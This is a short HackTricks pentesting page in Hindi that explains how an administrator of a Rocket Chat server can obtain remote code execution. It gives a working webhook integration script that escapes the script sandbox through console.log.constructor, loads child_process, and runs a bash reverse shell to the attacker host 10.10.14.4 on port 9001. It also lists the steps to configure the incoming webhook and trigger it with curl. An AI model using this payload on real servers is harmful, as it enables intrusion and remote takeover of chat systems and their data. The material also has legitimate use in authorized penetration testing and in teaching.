Rocket Chat

Support HackTricks

RCE

यदि आप Rocket Chat के अंदर व्यवस्थापक हैं तो आप RCE प्राप्त कर सकते हैं।

  • Integrations पर जाएं और New Integration चुनें और कोई भी चुनें: Incoming WebHook या Outgoing WebHook

  • /admin/integrations/incoming

const require = console.log.constructor('return process.mainModule.require')();
const { exec } = require('child_process');
exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")
  • WebHook कॉन्फ़िगर करें (चैनल और पोस्ट के रूप में उपयोगकर्ता नाम होना चाहिए):

  • WebHook स्क्रिप्ट कॉन्फ़िगर करें:

  • परिवर्तनों को सहेजें

  • उत्पन्न WebHook URL प्राप्त करें:

  • इसे curl के साथ कॉल करें और आपको rev shell प्राप्त होना चाहिए

HackTricks का समर्थन करें

Last updated